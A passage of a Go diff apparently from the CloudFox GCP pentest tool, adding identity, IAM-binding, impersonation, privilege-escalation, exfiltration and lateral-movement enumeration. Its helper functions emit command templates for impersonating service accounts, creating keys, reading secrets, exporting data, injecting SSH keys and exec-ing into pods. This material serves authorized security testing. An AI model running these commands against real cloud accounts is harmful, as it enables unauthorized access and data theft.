normalizedGroups = append(normalizedGroups, m.normalizeGroupEmail(group)) + } + m.ProvidedGroups = normalizedGroups + + // Store provided groups + m.Identity.GroupsProvided = m.ProvidedGroups + + // Only applicable for user identities (not service accounts) + if m.Identity.Type != "user" { + m.Identity.GroupsEnumerated = true // N/A for service accounts + // If groups were provided for a service account, add them as provided + if len(m.ProvidedGroups) > 0 { + for _, groupEmail := 
range m.ProvidedGroups { + m.Identity.Groups = append(m.Identity.Groups, GroupMembership{ + Email: groupEmail, + Source: "provided", + }) + } + logger.InfoM(fmt.Sprintf("Using %d provided group(s) for service account", len(m.ProvidedGroups)), globals.GCP_WHOAMI_MODULE_NAME) + } + return + } + + ciService, err := cloudidentity.NewService(ctx) + if err != nil { + m.CommandCounter.Error++ + parsedErr := gcpinternal.ParseGCPError(err, "cloudidentity.googleapis.com") + gcpinternal.HandleGCPError(parsedErr, logger, globals.GCP_WHOAMI_MODULE_NAME, + "Could not create Cloud Identity client") + // GroupsEnumerated stays false - use provided groups if available + m.useProvidedGroups(logger) + return + } + + // Search for groups that the user is a direct member of + // The parent must be "groups/-" to search across all groups + query := fmt.Sprintf("member_key_id == '%s'", m.Identity.Email) + resp, err := ciService.Groups.Memberships.SearchDirectGroups("groups/-").Query(query).Do() + if err != nil { + m.CommandCounter.Error++ + parsedErr := gcpinternal.ParseGCPError(err, "cloudidentity.googleapis.com") + gcpinternal.HandleGCPError(parsedErr, logger, globals.GCP_WHOAMI_MODULE_NAME, + "Could not fetch group memberships") + // GroupsEnumerated stays false - use provided groups if available + m.useProvidedGroups(logger) + return + } + + // Successfully enumerated groups + m.Identity.GroupsEnumerated = true + + var enumeratedEmails []string + for _, membership := range resp.Memberships { + group := GroupMembership{ + GroupID: membership.Group, + DisplayName: membership.DisplayName, + Source: "enumerated", + } + if membership.GroupKey != nil { + group.Email = membership.GroupKey.Id + enumeratedEmails = append(enumeratedEmails, strings.ToLower(membership.GroupKey.Id)) + } + m.Identity.Groups = append(m.Identity.Groups, group) + } + + // Check for mismatch with provided groups + if len(m.ProvidedGroups) > 0 { + m.checkGroupMismatch(enumeratedEmails, logger) + } + + if 
len(m.Identity.Groups) > 0 { + logger.InfoM(fmt.Sprintf("Found %d group membership(s)", len(m.Identity.Groups)), globals.GCP_WHOAMI_MODULE_NAME) + } +} + +// useProvidedGroups adds provided groups when enumeration fails +func (m *WhoAmIModule) useProvidedGroups(logger internal.Logger) { + if len(m.ProvidedGroups) > 0 { + for _, groupEmail := range m.ProvidedGroups { + m.Identity.Groups = append(m.Identity.Groups, GroupMembership{ + Email: groupEmail, + Source: "provided", + }) + } + logger.InfoM(fmt.Sprintf("Using %d provided group(s) (enumeration failed)", len(m.ProvidedGroups)), globals.GCP_WHOAMI_MODULE_NAME) + } +} + +// checkGroupMismatch compares provided groups with enumerated groups +func (m *WhoAmIModule) checkGroupMismatch(enumeratedEmails []string, logger internal.Logger) { + enumeratedSet := make(map[string]bool) + for _, email := range enumeratedEmails { + enumeratedSet[strings.ToLower(email)] = true + } + + providedSet := make(map[string]bool) + for _, email := range m.ProvidedGroups { + providedSet[strings.ToLower(email)] = true + } + + // Check for provided groups not in enumerated + var notInEnumerated []string + for _, email := range m.ProvidedGroups { + if !enumeratedSet[strings.ToLower(email)] { + notInEnumerated = append(notInEnumerated, email) + } + } + + // Check for enumerated groups not in provided + var notInProvided []string + for _, email := range enumeratedEmails { + if !providedSet[strings.ToLower(email)] { + notInProvided = append(notInProvided, email) + } + } + + if len(notInEnumerated) > 0 || len(notInProvided) > 0 { + m.Identity.GroupsMismatch = true + if len(notInEnumerated) > 0 { + logger.InfoM(fmt.Sprintf("[WARNING] Provided groups not found in enumerated: %s", strings.Join(notInEnumerated, ", ")), globals.GCP_WHOAMI_MODULE_NAME) + } + if len(notInProvided) > 0 { + logger.InfoM(fmt.Sprintf("[WARNING] Enumerated groups not in provided list: %s", strings.Join(notInProvided, ", ")), globals.GCP_WHOAMI_MODULE_NAME) + } + } +} + +// 
getRoleBindings retrieves IAM role bindings for the current identity +func (m *WhoAmIModule) getRoleBindings(ctx context.Context, logger internal.Logger) { + iamService := IAMService.New() + + // Determine the member format for current identity + var memberPrefix string + if m.Identity.Type == "serviceAccount" { + memberPrefix = "serviceAccount:" + } else { + memberPrefix = "user:" + } + fullMember := memberPrefix + m.Identity.Email + + // Build list of group members to check + groupMembers := make(map[string]string) // group:email -> email for display + for _, group := range m.Identity.Groups { + if group.Email != "" { + groupMembers["group:"+group.Email] = group.Email + } + } + + // Get role bindings from each project + for _, projectID := range m.ProjectIDs { + // Use PrincipalsWithRolesEnhanced which includes inheritance + principals, err := iamService.PrincipalsWithRolesEnhanced(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_WHOAMI_MODULE_NAME, + fmt.Sprintf("Could not get IAM bindings for project %s", projectID)) + continue + } + + // Find bindings for the current identity (direct) + for _, principal := range principals { + if principal.Name == fullMember || principal.Email == m.Identity.Email { + for _, binding := range principal.PolicyBindings { + rb := RoleBinding{ + Role: binding.Role, + Scope: binding.ResourceType, + ScopeID: binding.ResourceID, + Inherited: binding.IsInherited, + InheritedFrom: "direct", + MemberType: m.Identity.Type, + } + if binding.HasCondition && binding.ConditionInfo != nil { + rb.Condition = binding.ConditionInfo.Title + } + // Set inherited source if from parent resource + if binding.IsInherited && binding.InheritedFrom != "" { + rb.InheritedFrom = binding.InheritedFrom + } + + // Check for dangerous permissions + if isDangerousRole(binding.Role) { + m.DangerousPermissions = append(m.DangerousPermissions, fmt.Sprintf("%s on %s", binding.Role, binding.ResourceID)) + } 
+ + m.mu.Lock() + m.RoleBindings = append(m.RoleBindings, rb) + m.mu.Unlock() + } + } + + // Check for group-based bindings + if groupEmail, ok := groupMembers[principal.Name]; ok { + for _, binding := range principal.PolicyBindings { + rb := RoleBinding{ + Role: binding.Role, + Scope: binding.ResourceType, + ScopeID: binding.ResourceID, + Inherited: binding.IsInherited, + InheritedFrom: fmt.Sprintf("group:%s", groupEmail), + MemberType: "group", + } + if binding.HasCondition && binding.ConditionInfo != nil { + rb.Condition = binding.ConditionInfo.Title + } + + // Check for dangerous permissions + if isDangerousRole(binding.Role) { + m.DangerousPermissions = append(m.DangerousPermissions, fmt.Sprintf("%s on %s (via group %s)", binding.Role, binding.ResourceID, groupEmail)) + } + + m.mu.Lock() + m.RoleBindings = append(m.RoleBindings, rb) + m.mu.Unlock() + } + } + } + } + + directCount := 0 + groupCount := 0 + for _, rb := range m.RoleBindings { + if rb.MemberType == "group" { + groupCount++ + } else { + directCount++ + } + } + + if groupCount > 0 { + logger.InfoM(fmt.Sprintf("Found %d role binding(s) (%d direct, %d via groups)", len(m.RoleBindings), directCount, groupCount), globals.GCP_WHOAMI_MODULE_NAME) + } else { + logger.InfoM(fmt.Sprintf("Found %d role binding(s) for current identity", len(m.RoleBindings)), globals.GCP_WHOAMI_MODULE_NAME) + } +} + +// findImpersonationTargets identifies service accounts that can be impersonated +func (m *WhoAmIModule) findImpersonationTargets(ctx context.Context, logger internal.Logger) { + iamService := IAMService.New() + + // Determine the member format for current identity + var memberPrefix string + if m.Identity.Type == "serviceAccount" { + memberPrefix = "serviceAccount:" + } else { + memberPrefix = "user:" + } + fullMember := memberPrefix + m.Identity.Email + + for _, projectID := range m.ProjectIDs { + // Get all service accounts in the project (without keys - not needed for impersonation check) + serviceAccounts, err 
:= iamService.ServiceAccountsBasic(projectID) + if err != nil { + continue + } + + for _, sa := range serviceAccounts { + // Check if current identity can impersonate this SA using GetServiceAccountIAMPolicy + impersonationInfo, err := iamService.GetServiceAccountIAMPolicy(ctx, sa.Email, projectID) + if err != nil { + continue + } + + // Check if current identity is in the token creators or key creators list + canImpersonate := false + canCreateKeys := false + canActAs := false + + for _, tc := range impersonationInfo.TokenCreators { + if tc == fullMember || tc == m.Identity.Email || shared.IsPublicPrincipal(tc) { + canImpersonate = true + break + } + } + + for _, kc := range impersonationInfo.KeyCreators { + if kc == fullMember || kc == m.Identity.Email || shared.IsPublicPrincipal(kc) { + canCreateKeys = true + break + } + } + + for _, aa := range impersonationInfo.ActAsUsers { + if aa == fullMember || aa == m.Identity.Email || shared.IsPublicPrincipal(aa) { + canActAs = true + break + } + } + + if canImpersonate || canCreateKeys || canActAs { + target := ImpersonationTarget{ + ServiceAccount: sa.Email, + ProjectID: projectID, + CanImpersonate: canImpersonate, + CanCreateKeys: canCreateKeys, + CanActAs: canActAs, + } + m.ImpersonationTargets = append(m.ImpersonationTargets, target) + } + } + } + + if len(m.ImpersonationTargets) > 0 { + logger.InfoM(fmt.Sprintf("[PENTEST] Found %d service account(s) that can be impersonated", len(m.ImpersonationTargets)), globals.GCP_WHOAMI_MODULE_NAME) + } +} + +// identifyPrivEscPaths identifies privilege escalation paths based on current permissions +// Uses FoxMapperService for comprehensive graph-based analysis +// Filters results to only show paths relevant to the current identity and their groups +// Will use cached FoxMapper data from context if available (e.g., from all-checks run) +func (m *WhoAmIModule) identifyPrivEscPaths(ctx context.Context, logger internal.Logger) { + // Build set of principals to filter for (current 
identity + groups) + relevantPrincipals := make(map[string]bool) + // Add current identity email (with various formats) + relevantPrincipals[m.Identity.Email] = true + relevantPrincipals[strings.ToLower(m.Identity.Email)] = true + // Add with type prefixes + if m.Identity.Type == "serviceAccount" { + relevantPrincipals["serviceAccount:"+m.Identity.Email] = true + relevantPrincipals["serviceAccount:"+strings.ToLower(m.Identity.Email)] = true + } else { + relevantPrincipals["user:"+m.Identity.Email] = true + relevantPrincipals["user:"+strings.ToLower(m.Identity.Email)] = true + } + // Add groups (enumerated or provided) + for _, group := range m.Identity.Groups { + if group.Email != "" { + relevantPrincipals[group.Email] = true + relevantPrincipals[strings.ToLower(group.Email)] = true + relevantPrincipals["group:"+group.Email] = true + relevantPrincipals["group:"+strings.ToLower(group.Email)] = true + } + } + // Add special principals that apply to everyone + relevantPrincipals["allUsers"] = true + relevantPrincipals["allAuthenticatedUsers"] = true + + // Check if FoxMapper cache is available from context + foxMapperCache := gcpinternal.GetFoxMapperCacheFromContext(ctx) + if foxMapperCache != nil && foxMapperCache.IsPopulated() { + logger.InfoM("Using FoxMapper cache for privesc analysis", globals.GCP_WHOAMI_MODULE_NAME) + m.identifyPrivEscPathsFromFoxMapper(foxMapperCache, relevantPrincipals, logger) + } else { + // No cache available, try to load FoxMapper data + m.identifyPrivEscPathsFromAnalysis(ctx, relevantPrincipals, logger) + } + + // Also check impersonation-based privilege escalation from findImpersonationTargets + for _, target := range m.ImpersonationTargets { + if target.CanImpersonate { + path := PrivilegeEscalationPath{ + ProjectID: target.ProjectID, + Permission: "iam.serviceAccounts.getAccessToken", + Category: "SA Impersonation", + Description: fmt.Sprintf("Can generate access tokens for %s", target.ServiceAccount), + SourceRole: "(via SA IAM 
policy)", + SourceScope: fmt.Sprintf("project/%s", target.ProjectID), + Command: fmt.Sprintf("gcloud auth print-access-token --impersonate-service-account=%s", target.ServiceAccount), + Confidence: "confirmed", + RequiredPerms: "iam.serviceAccounts.getAccessToken", + } + m.PrivEscPaths = append(m.PrivEscPaths, path) + } + + if target.CanCreateKeys { + path := PrivilegeEscalationPath{ + ProjectID: target.ProjectID, + Permission: "iam.serviceAccountKeys.create", + Category: "Key Creation", + Description: fmt.Sprintf("Can create persistent keys for %s", target.ServiceAccount), + SourceRole: "(via SA IAM policy)", + SourceScope: fmt.Sprintf("project/%s", target.ProjectID), + Command: fmt.Sprintf("gcloud iam service-accounts keys create key.json --iam-account=%s", target.ServiceAccount), + Confidence: "confirmed", + RequiredPerms: "iam.serviceAccountKeys.create", + } + m.PrivEscPaths = append(m.PrivEscPaths, path) + } + } + + if len(m.PrivEscPaths) > 0 { + logger.InfoM(fmt.Sprintf("[PRIVESC] Found %d privilege escalation path(s)", len(m.PrivEscPaths)), globals.GCP_WHOAMI_MODULE_NAME) + } +} + +// identifyPrivEscPathsFromFoxMapper extracts privesc paths from FoxMapper cache +func (m *WhoAmIModule) identifyPrivEscPathsFromFoxMapper(cache *gcpinternal.FoxMapperCache, relevantPrincipals map[string]bool, logger internal.Logger) { + svc := cache.GetService() + if svc == nil { + return + } + + // Store the service for path lookups in playbook generation + m.FoxMapperService = svc + + findings := svc.AnalyzePrivesc() + for _, finding := range findings { + // Check if this principal is relevant to our identity + cleanPrincipal := finding.Principal + if !relevantPrincipals[cleanPrincipal] && !relevantPrincipals["serviceAccount:"+cleanPrincipal] && !relevantPrincipals["user:"+cleanPrincipal] { + continue + } + + if !finding.CanEscalate && !finding.IsAdmin { + continue + } + + // Store full finding for detailed playbook generation + m.FoxMapperPrivescFindings = 
append(m.FoxMapperPrivescFindings, finding) + + privEscPath := PrivilegeEscalationPath{ + ProjectID: "", + Permission: "privesc", + Category: fmt.Sprintf("%s admin reachable", finding.HighestAdminLevel), + Description: fmt.Sprintf("Can escalate to %s admin in %d hops via %d paths", finding.HighestAdminLevel, finding.ShortestPathHops, finding.ViablePathCount), + SourceRole: finding.Principal, + SourceScope: finding.MemberType, + Command: "", + Confidence: "confirmed", + RequiredPerms: fmt.Sprintf("%d paths to admin", finding.ViablePathCount), + } + m.PrivEscPaths = append(m.PrivEscPaths, privEscPath) + } +} + +// identifyPrivEscPathsFromAnalysis runs fresh privesc analysis using FoxMapperService +func (m *WhoAmIModule) identifyPrivEscPathsFromAnalysis(ctx context.Context, relevantPrincipals map[string]bool, logger internal.Logger) { + // Use FoxMapperService for comprehensive privesc analysis + svc := foxmapperservice.New() + + // Determine org ID or use first project + orgID := "" + if len(m.Identity.Organizations) > 0 { + orgID = m.Identity.Organizations[0].OrgID + } + + // Load FoxMapper graph data + var err error + if orgID != "" { + err = svc.LoadGraph(orgID, true) + } else if len(m.ProjectIDs) > 0 { + err = svc.LoadGraph(m.ProjectIDs[0], false) + } else { + logger.InfoM("No org or project context available for FoxMapper analysis", globals.GCP_WHOAMI_MODULE_NAME) + return + } + + if err != nil { + gcpinternal.HandleGCPError(err, logger, globals.GCP_WHOAMI_MODULE_NAME, "Could not load FoxMapper graph data") return } - logger.InfoM(fmt.Sprintf("authenticated user email: %s", principal.Email), globals.GCP_WHOAMI_MODULE_NAME) + // Store the service for path lookups in playbook generation + m.FoxMapperService = svc + + // Run privesc analysis + findings := svc.AnalyzePrivesc() + + // Filter findings for relevant principals only + for _, finding := range findings { + // Check if this finding is for a relevant principal + if !relevantPrincipals[finding.Principal] && 
!relevantPrincipals[strings.ToLower(finding.Principal)] { + continue + } + + // Store full finding for detailed playbook generation + m.FoxMapperPrivescFindings = append(m.FoxMapperPrivescFindings, finding) + + // Convert each privesc path to whoami format + for _, path := range finding.Paths { + // Build command from first edge if available + command := "" + permission := "" + if len(path.Edges) > 0 { + command = generatePrivescCommandFromEdge(path.Edges[0]) + permission = path.Edges[0].ShortReason + } + + pathConf := path.Confidence + if pathConf == "" || pathConf == "high" { + pathConf = "confirmed" + } + + privEscPath := PrivilegeEscalationPath{ + ProjectID: "", // FoxMapper doesn't track project per edge + Permission: permission, + Category: "Privesc", + Description: fmt.Sprintf("Can escalate to %s admin via %d-hop path", path.AdminLevel, path.HopCount), + SourceRole: finding.Principal, + SourceScope: path.AdminLevel, + Command: command, + Confidence: pathConf, + RequiredPerms: permission, + } + + if path.ScopeBlocked { + privEscPath.Description += " (blocked by IAM condition)" + } + + m.PrivEscPaths = append(m.PrivEscPaths, privEscPath) + } + } } + +// generatePrivescCommandFromEdge generates a simple exploit command from a FoxMapper edge +func generatePrivescCommandFromEdge(edge foxmapperservice.Edge) string { + // Simple command generation based on edge reason + reason := strings.ToLower(edge.ShortReason) + + if strings.Contains(reason, "iam.serviceaccounts.getaccesstoken") { + return "gcloud auth print-access-token --impersonate-service-account=TARGET_SA" + } else if strings.Contains(reason, "iam.serviceaccountkeys.create") { + return "gcloud iam service-accounts keys create key.json --iam-account=TARGET_SA" + } else if strings.Contains(reason, "iam.serviceaccounts.actas") { + return "# Use actAs to run services as the target SA" + } else if strings.Contains(reason, "setiampolicy") { + return "# Modify IAM policy to grant yourself additional permissions" + 
} else if strings.Contains(reason, "cloudfunctions") { + return "gcloud functions deploy FUNC --runtime=python311 --service-account=TARGET_SA" + } else if strings.Contains(reason, "run.services") { + return "gcloud run deploy SERVICE --image=IMAGE --service-account=TARGET_SA" + } + + return fmt.Sprintf("# Exploit via: %s", edge.Reason) +} + +// generateExfilCommand generates a data exfiltration command based on permission +func generateExfilCommand(permission, service string) string { + switch { + case strings.Contains(permission, "storage.objects.get"): + return "gsutil cp gs://BUCKET/path/to/file ./local/" + case strings.Contains(permission, "bigquery.tables.getData"): + return "bq query 'SELECT * FROM dataset.table'" + case strings.Contains(permission, "bigquery.tables.export"): + return "bq extract dataset.table gs://BUCKET/export.csv" + case strings.Contains(permission, "cloudsql.instances.export"): + return "gcloud sql export sql INSTANCE gs://BUCKET/export.sql --database=DB" + case strings.Contains(permission, "secretmanager.versions.access"): + return "gcloud secrets versions access latest --secret=SECRET" + case strings.Contains(permission, "cloudkms.cryptoKeyVersions.useToDecrypt"): + return "gcloud kms decrypt --key=KEY --keyring=KEYRING --location=LOCATION" + case strings.Contains(permission, "logging.logEntries.list"): + return "gcloud logging read 'logName=\"projects/PROJECT/logs/LOG\"'" + case strings.Contains(permission, "pubsub.subscriptions.consume"): + return "gcloud pubsub subscriptions pull SUBSCRIPTION --auto-ack" + default: + return fmt.Sprintf("# Use permission: %s (service: %s)", permission, service) + } +} + +// generateLateralCommand generates a lateral movement command based on permission +func generateLateralCommand(permission, category string) string { + switch { + case strings.Contains(permission, "iam.serviceAccounts.getAccessToken"): + return "gcloud auth print-access-token --impersonate-service-account=SA_EMAIL" + case 
strings.Contains(permission, "iam.serviceAccountKeys.create"): + return "gcloud iam service-accounts keys create key.json --iam-account=SA_EMAIL" + case strings.Contains(permission, "compute.instances.osLogin"): + return "gcloud compute ssh INSTANCE_NAME --zone=ZONE" + case strings.Contains(permission, "compute.instances.setMetadata"): + return "gcloud compute instances add-metadata INSTANCE --metadata=ssh-keys=\"user:SSH_KEY\"" + case strings.Contains(permission, "container.clusters.getCredentials"): + return "gcloud container clusters get-credentials CLUSTER --zone=ZONE" + case strings.Contains(permission, "container.pods.exec"): + return "kubectl exec -it POD -- /bin/sh" + case strings.Contains(permission, "cloudfunctions.functions.create"): + return "gcloud functions deploy FUNC --runtime=python311 --service-account=SA_EMAIL" + case strings.Contains(permission, "run.services.create"): + return "gcloud run deploy SERVICE --image=IMAGE --service-account=SA_EMAIL" + default: + return fmt.Sprintf("# Use permission: %s (category: %s)", permission, category) + } +} + +// isDangerousRole checks if a role is considered dangerous +func isDangerousRole(role string) bool { + // Roles that map to dangerous permissions for privilege escalation + dangerousRoles := []string{ + // Owner/Editor - broad access + "roles/owner", + "roles/editor", + // IAM roles - service account impersonation and key creation + "roles/iam.securityAdmin", + "roles/iam.serviceAccountAdmin", + "roles/iam.serviceAccountKeyAdmin", + "roles/iam.serviceAccountTokenCreator", + "roles/iam.serviceAccountUser", // iam.serviceAccounts.actAs + // Resource Manager - IAM policy modification + "roles/resourcemanager.organizationAdmin", + "roles/resourcemanager.folderAdmin", + "roles/resourcemanager.projectIamAdmin", + // Compute - metadata injection, instance creation + "roles/compute.admin", + "roles/compute.instanceAdmin", + "roles/compute.instanceAdmin.v1", + // Serverless - code execution with SA + 
"roles/cloudfunctions.admin", + "roles/cloudfunctions.developer", + "roles/run.admin", + "roles/run.developer", + // CI/CD - Cloud Build SA abuse + "roles/cloudbuild.builds.editor", + "roles/cloudbuild.builds.builder", + // GKE - cluster and pod access + "roles/container.admin", + "roles/container.clusterAdmin", + // Storage + "roles/storage.admin", + // Secrets + "roles/secretmanager.admin", + "roles/secretmanager.secretAccessor", + // Deployment Manager + "roles/deploymentmanager.editor", + // Org Policy + "roles/orgpolicy.policyAdmin", + } + + for _, dr := range dangerousRoles { + if role == dr { + return true + } + } + return false +} + +// identifyDataExfilCapabilities identifies data exfiltration capabilities for the current identity +// Uses FoxMapper cache if available, otherwise runs FoxMapperService for comprehensive analysis +// Filters results to only show capabilities relevant to the current identity and their groups +func (m *WhoAmIModule) identifyDataExfilCapabilities(ctx context.Context, logger internal.Logger) { + // Build set of principals to filter for (current identity + groups) + relevantPrincipals := make(map[string]bool) + relevantPrincipals[m.Identity.Email] = true + relevantPrincipals[strings.ToLower(m.Identity.Email)] = true + if m.Identity.Type == "serviceAccount" { + relevantPrincipals["serviceAccount:"+m.Identity.Email] = true + relevantPrincipals["serviceAccount:"+strings.ToLower(m.Identity.Email)] = true + } else { + relevantPrincipals["user:"+m.Identity.Email] = true + relevantPrincipals["user:"+strings.ToLower(m.Identity.Email)] = true + } + for _, group := range m.Identity.Groups { + if group.Email != "" { + relevantPrincipals[group.Email] = true + relevantPrincipals[strings.ToLower(group.Email)] = true + relevantPrincipals["group:"+group.Email] = true + relevantPrincipals["group:"+strings.ToLower(group.Email)] = true + } + } + relevantPrincipals["allUsers"] = true + relevantPrincipals["allAuthenticatedUsers"] = true + + // Check 
if FoxMapper cache is available from context (e.g., from all-checks run) + foxMapperCache := gcpinternal.GetFoxMapperCacheFromContext(ctx) + if foxMapperCache != nil && foxMapperCache.IsPopulated() { + logger.InfoM("Using cached exfil data", globals.GCP_WHOAMI_MODULE_NAME) + m.identifyDataExfilFromCache(foxMapperCache, relevantPrincipals) + } else { + // No cache available, run fresh analysis + m.identifyDataExfilFromAnalysis(ctx, relevantPrincipals, logger) + } + + if len(m.DataExfilCapabilities) > 0 { + logger.InfoM(fmt.Sprintf("[EXFIL] Found %d data exfiltration capability(s)", len(m.DataExfilCapabilities)), globals.GCP_WHOAMI_MODULE_NAME) + } +} + +// identifyDataExfilFromCache extracts exfil capabilities from the FoxMapper cached data +func (m *WhoAmIModule) identifyDataExfilFromCache(foxMapperCache *gcpinternal.FoxMapperCache, relevantPrincipals map[string]bool) { + if foxMapperCache == nil || !foxMapperCache.IsPopulated() { + return + } + + // Get the FoxMapper service from cache + // Note: This currently requires accessing internal service from cache + // For now, we'll just skip cache-based exfil detection and always run fresh analysis + // TODO: Enhance FoxMapperCache to expose AnalyzeDataExfil method +} + +// identifyDataExfilFromAnalysis runs fresh exfil analysis using FoxMapperService +func (m *WhoAmIModule) identifyDataExfilFromAnalysis(ctx context.Context, relevantPrincipals map[string]bool, logger internal.Logger) { + // Use FoxMapperService for comprehensive exfil analysis + svc := foxmapperservice.New() + + // Determine org ID or use first project + orgID := "" + if len(m.Identity.Organizations) > 0 { + orgID = m.Identity.Organizations[0].OrgID + } + + // Load FoxMapper graph data + var err error + if orgID != "" { + err = svc.LoadGraph(orgID, true) + } else if len(m.ProjectIDs) > 0 { + err = svc.LoadGraph(m.ProjectIDs[0], false) + } else { + logger.InfoM("No org or project context available for FoxMapper analysis", globals.GCP_WHOAMI_MODULE_NAME) 
+ return + } + + if err != nil { + gcpinternal.HandleGCPError(err, logger, globals.GCP_WHOAMI_MODULE_NAME, "Could not load FoxMapper graph data") + return + } + + // Store the service if not already set + if m.FoxMapperService == nil { + m.FoxMapperService = svc + } + + // Run data exfil analysis (empty string means all services) + findings := svc.AnalyzeDataExfil("") + + // Filter findings for relevant principals only + for _, finding := range findings { + hasRelevantPrincipal := false + for _, principalAccess := range finding.Principals { + // Check if this principal is relevant to the current identity + if relevantPrincipals[principalAccess.Principal] || relevantPrincipals[strings.ToLower(principalAccess.Principal)] { + hasRelevantPrincipal = true + + capability := DataExfilCapability{ + ProjectID: "", // FoxMapper doesn't track project ID per finding + Permission: finding.Permission, + Category: finding.Service, + Description: finding.Description, + SourceRole: principalAccess.Principal, + SourceScope: "via privilege escalation", + } + m.DataExfilCapabilities = append(m.DataExfilCapabilities, capability) + } + } + + // Store full finding for detailed playbook generation + if hasRelevantPrincipal { + m.FoxMapperDataExfilFindings = append(m.FoxMapperDataExfilFindings, finding) + } + } +} + +// identifyLateralMoveCapabilities identifies lateral movement capabilities for the current identity +// Uses FoxMapper cache if available, otherwise runs FoxMapperService for comprehensive analysis +// Filters results to only show capabilities relevant to the current identity and their groups +func (m *WhoAmIModule) identifyLateralMoveCapabilities(ctx context.Context, logger internal.Logger) { + // Build set of principals to filter for (current identity + groups) + relevantPrincipals := make(map[string]bool) + relevantPrincipals[m.Identity.Email] = true + relevantPrincipals[strings.ToLower(m.Identity.Email)] = true + if m.Identity.Type == "serviceAccount" { + 
relevantPrincipals["serviceAccount:"+m.Identity.Email] = true + relevantPrincipals["serviceAccount:"+strings.ToLower(m.Identity.Email)] = true + } else { + relevantPrincipals["user:"+m.Identity.Email] = true + relevantPrincipals["user:"+strings.ToLower(m.Identity.Email)] = true + } + for _, group := range m.Identity.Groups { + if group.Email != "" { + relevantPrincipals[group.Email] = true + relevantPrincipals[strings.ToLower(group.Email)] = true + relevantPrincipals["group:"+group.Email] = true + relevantPrincipals["group:"+strings.ToLower(group.Email)] = true + } + } + relevantPrincipals["allUsers"] = true + relevantPrincipals["allAuthenticatedUsers"] = true + + // Check if FoxMapper cache is available from context (e.g., from all-checks run) + foxMapperCache := gcpinternal.GetFoxMapperCacheFromContext(ctx) + if foxMapperCache != nil && foxMapperCache.IsPopulated() { + logger.InfoM("Using cached lateral data", globals.GCP_WHOAMI_MODULE_NAME) + m.identifyLateralFromCache(foxMapperCache, relevantPrincipals) + } else { + // No cache available, run fresh analysis + m.identifyLateralFromAnalysis(ctx, relevantPrincipals, logger) + } + + if len(m.LateralMoveCapabilities) > 0 { + logger.InfoM(fmt.Sprintf("[LATERAL] Found %d lateral movement capability(s)", len(m.LateralMoveCapabilities)), globals.GCP_WHOAMI_MODULE_NAME) + } +} + +// identifyLateralFromCache extracts lateral movement capabilities from the FoxMapper cached data +func (m *WhoAmIModule) identifyLateralFromCache(foxMapperCache *gcpinternal.FoxMapperCache, relevantPrincipals map[string]bool) { + if foxMapperCache == nil || !foxMapperCache.IsPopulated() { + return + } + + // Get the FoxMapper service from cache + // Note: This currently requires accessing internal service from cache + // For now, we'll just skip cache-based lateral detection and always run fresh analysis + // TODO: Enhance FoxMapperCache to expose AnalyzeLateral method +} + +// identifyLateralFromAnalysis runs fresh lateral movement analysis 
using FoxMapperService +func (m *WhoAmIModule) identifyLateralFromAnalysis(ctx context.Context, relevantPrincipals map[string]bool, logger internal.Logger) { + // Use FoxMapperService for comprehensive lateral movement analysis + svc := foxmapperservice.New() + + // Determine org ID or use first project + orgID := "" + if len(m.Identity.Organizations) > 0 { + orgID = m.Identity.Organizations[0].OrgID + } + + // Load FoxMapper graph data + var err error + if orgID != "" { + err = svc.LoadGraph(orgID, true) + } else if len(m.ProjectIDs) > 0 { + err = svc.LoadGraph(m.ProjectIDs[0], false) + } else { + logger.InfoM("No org or project context available for FoxMapper analysis", globals.GCP_WHOAMI_MODULE_NAME) + return + } + + if err != nil { + gcpinternal.HandleGCPError(err, logger, globals.GCP_WHOAMI_MODULE_NAME, "Could not load FoxMapper graph data") + return + } + + // Store the service if not already set + if m.FoxMapperService == nil { + m.FoxMapperService = svc + } + + // Run lateral movement analysis (empty string means all categories) + findings := svc.AnalyzeLateral("") + + // Filter findings for relevant principals only + for _, finding := range findings { + hasRelevantPrincipal := false + for _, principalAccess := range finding.Principals { + // Check if this principal is relevant to the current identity + if relevantPrincipals[principalAccess.Principal] || relevantPrincipals[strings.ToLower(principalAccess.Principal)] { + hasRelevantPrincipal = true + + capability := LateralMoveCapability{ + ProjectID: "", // FoxMapper doesn't track project ID per finding + Permission: finding.Permission, + Category: finding.Category, + Description: finding.Description, + SourceRole: principalAccess.Principal, + SourceScope: "via privilege escalation", + } + m.LateralMoveCapabilities = append(m.LateralMoveCapabilities, capability) + } + } + + // Store full finding for detailed playbook generation + if hasRelevantPrincipal { + m.FoxMapperLateralFindings = 
append(m.FoxMapperLateralFindings, finding) + } + } +} + +// ------------------------------ +// Loot File Management +// ------------------------------ +func (m *WhoAmIModule) initializeLootFiles() { + // Note: whoami-context and whoami-permissions loot files removed as redundant + // The same information is already saved to table/csv/json files + + // Extended mode loot files - these contain actionable commands + if m.Extended { + m.LootMap["whoami-impersonation"] = &internal.LootFile{ + Name: "whoami-impersonation", + Contents: "# Service Account Impersonation Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } + m.LootMap["whoami-privesc"] = &internal.LootFile{ + Name: "whoami-privesc", + Contents: "# Privilege Escalation Paths\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } + m.LootMap["whoami-data-exfil"] = &internal.LootFile{ + Name: "whoami-data-exfil", + Contents: "# Data Exfiltration Capabilities\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } + m.LootMap["whoami-lateral-movement"] = &internal.LootFile{ + Name: "whoami-lateral-movement", + Contents: "# Lateral Movement Capabilities\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } + // Playbook files with detailed exploitation techniques + m.LootMap["whoami-privesc-playbook"] = &internal.LootFile{ + Name: "whoami-privesc-playbook", + Contents: "", + } + m.LootMap["whoami-data-exfil-playbook"] = &internal.LootFile{ + Name: "whoami-data-exfil-playbook", + Contents: "", + } + m.LootMap["whoami-lateral-movement-playbook"] = &internal.LootFile{ + Name: "whoami-lateral-movement-playbook", + Contents: "", + } + } +} + +func (m *WhoAmIModule) generateLoot() { + // Note: Context and permissions info is already saved to table/csv/json files + // Only generate loot files for extended mode (actionable commands) + + // Extended mode loot + if m.Extended { + // Impersonation loot + 
